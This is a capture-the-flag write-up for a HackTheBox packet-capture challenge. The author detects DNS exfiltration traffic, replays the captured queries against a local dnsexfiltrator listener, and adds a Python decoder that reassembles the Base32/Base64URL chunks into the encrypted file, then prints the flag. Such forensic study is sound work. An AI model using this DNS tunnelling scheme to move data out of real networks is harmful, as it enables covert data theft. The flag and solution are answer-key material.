Hackthebox – Keep Tryin’

For this challenge I found a wireshark file and the hint said ‘This packet capture seems to show some suspicious traffic‘. Enough to start working with so time to take a look at the wireshark file.

When opening the wireshark file, the suspicious connections immediately pop out. There are several DNS packets containing apparent DNS exfiltration traffic.

Additional analysis reveals two HTTP POST requests. One goes to a /flag URI and contains the value ‘TryHarder’; the other goes to the /lootz URI and contains a base64-encoded string which, once decoded, reads ‘Keep trying, buffy’.

The DNS entries are interesting though, and the DNS exfiltration tools a co-worker used recently gave me a hint that it should be something like that. Some googling for the specific sequence led me to a GitHub repository containing both a C# and a Python version of the dnsexfiltrator tool.

root@kalivm:~/keeptrying# python dnsexfil.py -d totallylegit.com -p 1234
[*] DNS server listening on port 53

After some fiddling with the Python script I got it to start a listener on port 53 that looked like a normal DNS server but, as inspecting the code showed, was waiting for the init sequence I had also noticed in the PCAP file.

root@kalivm:~/keeptrying# dig TXT @localhost init.c2VjcmV0LnR4dHwx.totallylegit.com

So I tried to send the same request I saw in the dns traffic. This seemed to be the right thing as it was expecting something like this.

[!] Stopping DNS Server
Traceback (most recent call last):
  File "dnsexfil.py", line 158, in <module>
    msg = fromBase32(msgParts[1])
  File "dnsexfil.py", line 81, in fromBase32
    return b32decode(msg.upper() + padding)
  File "/usr/lib/python2.7/base64.py", line 229, in b32decode
    raise TypeError('Non-base32 digit found')
TypeError: Non-base32 digit found

In the other terminal, however, the Python script crashed with the message that a non-base32 digit had been found. After re-encoding the init request as a base32 string, it worked.

[+] Data was encoded using Base64URL
[+] Receiving file [secret.txt] as a ZIP file in [1] chunks
[============================================================] 100.0%	Receiving file	

[+] Decrypting using password [1234] and saving to output file [secret.txt.zip]
[+] Output file [secret.txt.zip] saved successfully

However, the received file still came out all jumbled and useless, so I must have missed something. After sending my own file across, the encoding/decoding sequence worked without issues, so I assumed there had to be something wrong with the password.

root@kalivm:~/keeptrying# python dnsexfil.py -d totallylegit.com -p TryHarder
[*] DNS server listening on port 53

I decided to restart the script, now with the alleged password that I saw in the HTTP requests.

root@kalivm:~/keeptrying# dig TXT @localhost INIT.ONSWG4TFOQXHI6DUPQYQ.totallylegit.com
root@kalivm:~/keeptrying# dig TXT @localhost 0.0ejXWsr6TH-P_1xkEstaVwi7WDy8AcxufnGotWXH3ckb2Lh5A-qFljIWOAOLUS0.T1W8P4CpiCZbCM7_QKcv-r0JG29RpsyYY5YkZRxo7YDIYUJpHlGgxu5PWV1G_DA.KNrmnrktfbeDgzcpPJBjPTeMYx3Qs1Q6bAuFhROWXemJ80gPTYIz0xl8usJQN3m.w.totallylegit.com

I resent the Base32-encoded init request and the ‘normal’ DNS request for the TXT record to the server.

[+] Data was encoded using Base64URL
[+] Receiving file [secret.txt] as a ZIP file in [1] chunks
[============================================================] 100.0%	Receiving file	

[+] Decrypting using password [TryHarder] and saving to output file [secret.txt.zip]
[+] Output file [secret.txt.zip] saved successfully
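To make the protocol pieces the capture shows explicit, here is an added Python script (my own, not part of the dnsexfiltrator tool) that takes DNS query names from the capture or a resolver log, decodes the Base32 init label into the filename and chunk count, and reassembles the Base64URL chunk labels into the encrypted payload. The sample queries are the init and data queries quoted above; decryption with the password is left to the tool.

```python
import base64
import binascii

# Query names copied from the capture walked through above: the init label
# and the single data chunk, both under the totallylegit.com domain.
SAMPLE_QUERIES = [
    "INIT.ONSWG4TFOQXHI6DUPQYQ.totallylegit.com",
    "0.0ejXWsr6TH-P_1xkEstaVwi7WDy8AcxufnGotWXH3ckb2Lh5A-qFljIWOAOLUS0."
    "T1W8P4CpiCZbCM7_QKcv-r0JG29RpsyYY5YkZRxo7YDIYUJpHlGgxu5PWV1G_DA."
    "KNrmnrktfbeDgzcpPJBjPTeMYx3Qs1Q6bAuFhROWXemJ80gPTYIz0xl8usJQN3m."
    "w.totallylegit.com",
]


def _pad(s, block):
    """Restore the '=' padding that is stripped before data goes into labels."""
    return s + "=" * (-len(s) % block)


def parse_init(labels):
    """Decode the Base32 init label into (filename, expected chunk count).

    A Base64 label here is the mistake the post ran into first: b32decode
    rejects it, so surface that as a clear error instead of a traceback."""
    try:
        meta = base64.b32decode(_pad(labels[0].upper(), 8)).decode()
    except binascii.Error as exc:
        raise ValueError("init label is not Base32: %s" % exc)
    name, count = meta.split("|")
    return name, int(count)


def reassemble(queries, domain):
    """Walk query names for one exfil session under `domain` and return
    (filename, chunk_count, payload bytes); unrelated names are skipped."""
    suffix = "." + domain
    filename, expected, chunks = None, None, {}
    for q in queries:
        if not q.lower().endswith(suffix):
            continue
        labels = q[: -len(suffix)].split(".")
        if labels[0].lower() == "init":
            filename, expected = parse_init(labels[1:])
        elif labels[0].isdigit():
            # chunk index first, then the Base64URL data split into labels
            chunks[int(labels[0])] = "".join(labels[1:])
    if expected is not None and len(chunks) != expected:
        raise ValueError("got %d of %d chunks" % (len(chunks), expected))
    data = "".join(chunks[i] for i in sorted(chunks))
    return filename, expected, base64.urlsafe_b64decode(_pad(data, 4))
```

The init label decodes to `secret.txt|1`, matching the tool's "Receiving file [secret.txt] ... in [1] chunks" line, and the 190 data characters decode to 142 bytes of ciphertext.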

This looks promising; time to extract the zip file and look at its contents.

root@kalivm:~/keeptrying# unzip secret.txt.zip 
Archive:  secret.txt.zip
  inflating: secret.txt
root@kalivm:~/keeptrying# cat secret.txt
HTB{$n3a<NOFLAG>r1ck$}

There is the flag!
